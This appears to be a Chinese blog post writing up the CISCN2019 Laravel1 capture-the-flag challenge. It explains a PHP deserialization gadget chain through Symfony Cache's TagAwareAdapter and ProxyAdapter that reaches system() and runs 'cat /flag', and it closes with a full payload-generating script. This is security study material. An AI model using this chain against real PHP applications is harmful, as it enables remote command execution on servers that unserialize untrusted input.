
<!DOCTYPE html>
<html lang="en" class="loading">
<head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <title>CISCN2019_Laravel1 - 月出从云</title>
    <meta name="apple-mobile-web-app-capable" content="yes" />
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="google" content="notranslate" />
    <meta name="keywords" content="Fechin,"> 
    <meta name="description" content="哇感觉这个题目放在线下真的算很难了..像我这种菜鸡偷看了一眼WP知道最终用哪个类还做了很久【
好回到题目来，这个题目直接明牌让你反序列化，所以找链成了一个很关键的事情，。
本菜鸡偷看了WP才知道是通,"> 
    
    <link rel="alternative" href="atom.xml" title="月出从云" type="application/atom+xml"> 
    <link rel="icon" href="/img/1.ico"> 
    
<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">

    
<link rel="stylesheet" href="/css/diaspora.css">

	<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
    <script>
         (adsbygoogle = window.adsbygoogle || []).push({
              google_ad_client: "ca-pub-8691406134231910",
              enable_page_level_ads: true
         });
    </script>
    <script async custom-element="amp-auto-ads"
        src="https://cdn.ampproject.org/v0/amp-auto-ads-0.1.js">
    </script>
<meta name="generator" content="Hexo 5.2.0"></head>

<body class="loading">
    <span id="config-title" style="display:none">月出从云</span>
    <div id="loader"></div>
    <div id="single">
    <div id="top" style="display: block;">
    <div class="bar" style="width: 0;"></div>
    <a class="iconfont icon-home image-icon" href="javascript:;" data-url="http://example.com"></a>
    <div title="播放/暂停" class="iconfont icon-play"></div>
    <h3 class="subtitle">CISCN2019_Laravel1</h3>
    <div class="social">
        <div>
            <div class="share">
                <a title="获取二维码" class="iconfont icon-scan" href="javascript:;"></a>
            </div>
            <div id="qr"></div>
        </div>
    </div>
    <div class="scrollbar"></div>
</div>

    <div class="section">
        <div class="article">
    <div class='main'>
        <h1 class="title">CISCN2019_Laravel1</h1>
        <div class="stuff">
            <span>三月 25, 2021</span>
            
  <ul class="post-tags-list" itemprop="keywords"><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/Laravel/" rel="tag">Laravel</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/PHP/" rel="tag">PHP</a></li><li class="post-tags-list-item"><a class="post-tags-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a></li></ul>


        </div>
        <div class="content markdown">
            <p>哇感觉这个题目放在线下真的算很难了..像我这种菜鸡偷看了一眼WP知道最终用哪个类还做了很久【</p>
<p>好回到题目来，这个题目直接明牌让你反序列化，所以找链成了一个很关键的事情，。</p>
<p>本菜鸡偷看了WP才知道是通过ProxyAdapter这个类操作，不知道大佬们是怎么做到发现的x，不管怎么样，就从本菜鸡的视角开始总结吧</p>
<p>再ProxyAdapter类当中有这么一个方法可以进行动调：</p>
<p><img src="image-20210325214522077.png" alt="image-20210325214522077"></p>
<p>重点代码就在这里，所以我们就要找能够触发的条件，但是很遗憾的就是该类自己没有destruct方法来触发，既然它没有我们就去找其他的类看看有没有同名saveDeferred的方法可以利用，或者是doSave方法，搜索一下就可以再TagAwareAdapter类中找到：</p>
<p><img src="image-20210325214545113.png" alt="image-20210325214545113"></p>
<p>那么其实总体思路就确认下来了，</p>
<p>令TagAwareAdapter的pool为ProxyAdapter类，之后的操作都可以说是顺理成章</p>
<p>那么回到ProxyAdapter类，既然已经有了触发的方法，我们下一步就是如何控制参数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">doSave</span>(<span class="params">CacheItemInterface $item, $method</span>)</span></span><br><span class="line"><span class="function">  </span>&#123;</span><br><span class="line">      <span class="keyword">if</span> (!$item <span class="keyword">instanceof</span> CacheItem) &#123;</span><br><span class="line">          <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">      &#125;</span><br><span class="line">      $item = (<span class="keyword">array</span>) $item;</span><br><span class="line">      <span class="keyword">if</span> (<span class="literal">null</span> === $item[<span class="string">&quot;\0*\0expiry&quot;</span>] &amp;&amp; <span class="number">0</span> &lt; $item[<span class="string">&quot;\0*\0defaultLifetime&quot;</span>]) &#123;</span><br><span class="line">          $item[<span class="string">&quot;\0*\0expiry&quot;</span>] = microtime(<span class="literal">true</span>) + $item[<span class="string">&quot;\0*\0defaultLifetime&quot;</span>];</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      <span class="keyword">if</span> ($item[<span class="string">&quot;\0*\0poolHash&quot;</span>] === <span class="keyword">$this</span>-&gt;poolHash &amp;&amp; $item[<span class="string">&quot;\0*\0innerItem&quot;</span>]) &#123;</span><br><span class="line">          $innerItem = $item[<span class="string">&quot;\0*\0innerItem&quot;</span>];</span><br><span class="line">      &#125; <span class="keyword">elseif</span> (<span class="keyword">$this</span>-&gt;pool <span class="keyword">instanceof</span> AdapterInterface) &#123;</span><br><span class="line">          <span class="comment">// this is an optimization specific for AdapterInterface implementations</span></span><br><span class="line">          <span class="comment">// so we can save a round-trip to the backend by just creating a new item</span></span><br><span class="line">          $f = <span class="keyword">$this</span>-&gt;createCacheItem;</span><br><span class="line">          $innerItem = $f(<span class="keyword">$this</span>-&gt;namespace.$item[<span class="string">&quot;\0*\0key&quot;</span>], <span class="literal">null</span>);</span><br><span class="line">      &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">          $innerItem = <span class="keyword">$this</span>-&gt;pool-&gt;getItem(<span class="keyword">$this</span>-&gt;namespace.$item[<span class="string">&quot;\0*\0key&quot;</span>]);</span><br><span class="line">      &#125;</span><br><span class="line"></span><br><span class="line">      (<span class="keyword">$this</span>-&gt;setInnerItem)($innerItem, $item);</span><br><span class="line"></span><br><span class="line">      <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;pool-&gt;$method($innerItem);</span><br></pre></td></tr></table></figure>

<p>部分代码，首先，setInnerItem是我们创建ProxyAdappter类就可以使用的，所以直接令</p>
<p>$this-&gt;setInnerItem = system 即可，</p>
<p>而如果想要控制$innerItem，就需要满足两个条件</p>
<ul>
<li><pre><code>null === $item[&quot;\0*\0expiry&quot;] &amp;&amp; 0 &lt; $item[&quot;\0*\0defaultLifetime&quot;])
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">而$item为上图被强转为数组的一个类，PHP的这个强转可以看这个师傅的</span><br><span class="line"></span><br><span class="line">![img](20190805111912-cbeb6868-b72f-1.png)</span><br><span class="line"></span><br><span class="line">其实就是会将属性给转掉，并且题目做出的操作其实就已经帮我们考虑到私有属性的不可见字符了</span><br><span class="line"></span><br><span class="line">故我们需要$item这个类的expriy属性存在，所以随便赋值就好</span><br><span class="line"></span><br><span class="line">+ &#96;&#96;&#96;php</span><br><span class="line">  $item[&quot;\0*\0poolHash&quot;] &#x3D;&#x3D;&#x3D; $this-&gt;poolHash &amp;&amp; $item[&quot;\0*\0innerItem&quot;])</span><br></pre></td></tr></table></figure>

要ProxyAdappter类的poolHash与item类的poolHash相同
</code></pre>
</li>
</ul>
<p>于是我们创建一个类</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">final</span> <span class="class"><span class="keyword">class</span> <span class="title">CacheItem</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">protected</span> $expiry;</span><br><span class="line">    <span class="keyword">protected</span> $poolHash;</span><br><span class="line">    <span class="keyword">protected</span> $innerItem;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">$expiry, $poolHash, $command</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;expiry = $expiry;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;poolHash = $poolHash;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;innerItem = $command;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$cacheItem = <span class="keyword">new</span> Symfony\Component\Cache\CacheItem(<span class="number">1</span>,<span class="number">1</span>,<span class="string">&quot;cat /flag&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>之后再创建ProxyAdappter类：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">  <span class="class"><span class="keyword">class</span> <span class="title">ProxyAdapter</span></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> $poolHash;</span><br><span class="line">        <span class="keyword">private</span> $setInnerItem;</span><br><span class="line"><span class="comment">//        $setInnerItem为我们想要控制的函数</span></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">$poolhash,$setInnerItem</span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;poolHash = $poolhash;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;setInnerItem=$setInnerItem;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">$proxyAdapter = <span class="keyword">new</span> Symfony\Component\Cache\Adapter\ProxyAdapter(<span class="number">1</span>,<span class="string">&quot;system&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>最后创建tagAwareAdapter类</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">TagAwareAdapter</span></span>&#123;</span><br><span class="line">    <span class="keyword">private</span> $pool;</span><br><span class="line">    <span class="keyword">private</span> $deferred=[];</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">$pool,$deferred</span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;pool = $pool;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;deferred = $deferred;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>拼接起来一下即可得到payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Symfony</span>\<span class="title">Component</span>\<span class="title">Cache</span>&#123;</span><br><span class="line">    <span class="title">final</span> <span class="title">class</span> <span class="title">CacheItem</span></span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title">protected</span> $<span class="title">expiry</span>;</span><br><span class="line">        <span class="keyword">protected</span> $poolHash;</span><br><span class="line">        <span class="keyword">protected</span> $innerItem;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">$expiry, $poolHash, $command</span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;expiry = $expiry;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;poolHash = $poolHash;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;innerItem = $command;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Symfony</span>\<span class="title">Component</span>\<span class="title">Cache</span>\<span class="title">Adapter</span>&#123;</span><br><span class="line">    <span class="title">class</span> <span class="title">TagAwareAdapter</span>&#123;</span><br><span class="line">        <span class="title">private</span> $<span class="title">pool</span>;</span><br><span class="line">        <span class="keyword">private</span> $deferred=[];</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">$pool,$deferred</span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;pool = $pool;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;deferred = $deferred;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">ProxyAdapter</span></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> $poolHash;</span><br><span class="line">        <span class="keyword">private</span> $setInnerItem;</span><br><span class="line"><span class="comment">//        $setInnerItem为我们想要控制的函数</span></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params">$poolhash,$setInnerItem</span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;poolHash = $poolhash;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;setInnerItem=$setInnerItem;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">namespace</span> &#123;</span><br><span class="line">    $<span class="title">proxyAdapter</span> = <span class="title">new</span> <span class="title">Symfony</span>\<span class="title">Component</span>\<span class="title">Cache</span>\<span class="title">Adapter</span>\<span class="title">ProxyAdapter</span>(1,&quot;<span class="title">system</span>&quot;);</span><br><span class="line">    $cacheItem = <span class="keyword">new</span> Symfony\Component\Cache\CacheItem(<span class="number">1</span>,<span class="number">1</span>,<span class="string">&quot;cat /flag&quot;</span>);</span><br><span class="line">    $tagAwareAdapter = <span class="keyword">new</span> Symfony\Component\Cache\Adapter\TagAwareAdapter($proxyAdapter,<span class="keyword">array</span>($cacheItem));</span><br><span class="line">    <span class="keyword">echo</span> urlencode(serialize($tagAwareAdapter));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
            <!--[if lt IE 9]><script>document.createElement('audio');</script><![endif]-->
            <audio id="audio" loop="1" preload="auto" controls="controls" data-autoplay="false">
                <source type="audio/mpeg" src="">
            </audio>
            
                <ul id="audio-list" style="display:none">
                    
                        
                            <li title='0' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                        
                            <li title='1' data-url='http://link.hhtjim.com/163/425570952.mp3'></li>
                        
                    
                </ul>
            
        </div>
        
    <div id='gitalk-container' class="comment link"
		data-enable='true'
        data-ae='false'
        data-ci=''
        data-cs=''
        data-r='https://github.com/ysllz/ysllz.github.io'
        data-o='https://github.com/ysllz/ysllz.github.io'
        data-a='ysllz'
        data-d='false'
    >查看评论</div>


    </div>
    
        <div class='side'>
				
        </div>
    
</div>


    </div>
</div>
</body>

<script src="//cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>


<script src="//lib.baomitu.com/jquery/1.8.3/jquery.min.js"></script>
<script src="/js/plugin.js"></script>
<script src="/js/typed.js"></script>
<script src="/js/diaspora.js"></script>


<link rel="stylesheet" href="/photoswipe/photoswipe.css">
<link rel="stylesheet" href="/photoswipe/default-skin/default-skin.css">


<script src="/photoswipe/photoswipe.min.js"></script>
<script src="/photoswipe/photoswipe-ui-default.min.js"></script>


<!-- Root element of PhotoSwipe. Must have class pswp. -->
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">
    <!-- Background of PhotoSwipe. 
         It's a separate element as animating opacity is faster than rgba(). -->
    <div class="pswp__bg"></div>
    <!-- Slides wrapper with overflow:hidden. -->
    <div class="pswp__scroll-wrap">
        <!-- Container that holds slides. 
            PhotoSwipe keeps only 3 of them in the DOM to save memory.
            Don't modify these 3 pswp__item elements, data is added later on. -->
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>
        <!-- Default (PhotoSwipeUI_Default) interface on top of sliding area. Can be changed. -->
        <div class="pswp__ui pswp__ui--hidden">
            <div class="pswp__top-bar">
                <!--  Controls are self-explanatory. Order can be changed. -->
                <div class="pswp__counter"></div>
                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>
                <button class="pswp__button pswp__button--share" title="Share"></button>
                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>
                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>
                <!-- Preloader demo http://codepen.io/dimsemenov/pen/yyBWoR -->
                <!-- element will get class pswp__preloader--active when preloader is running -->
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                      <div class="pswp__preloader__cut">
                        <div class="pswp__preloader__donut"></div>
                      </div>
                    </div>
                </div>
            </div>
            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div> 
            </div>
            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>
            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>
            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>
        </div>
    </div>
</div>






</html>
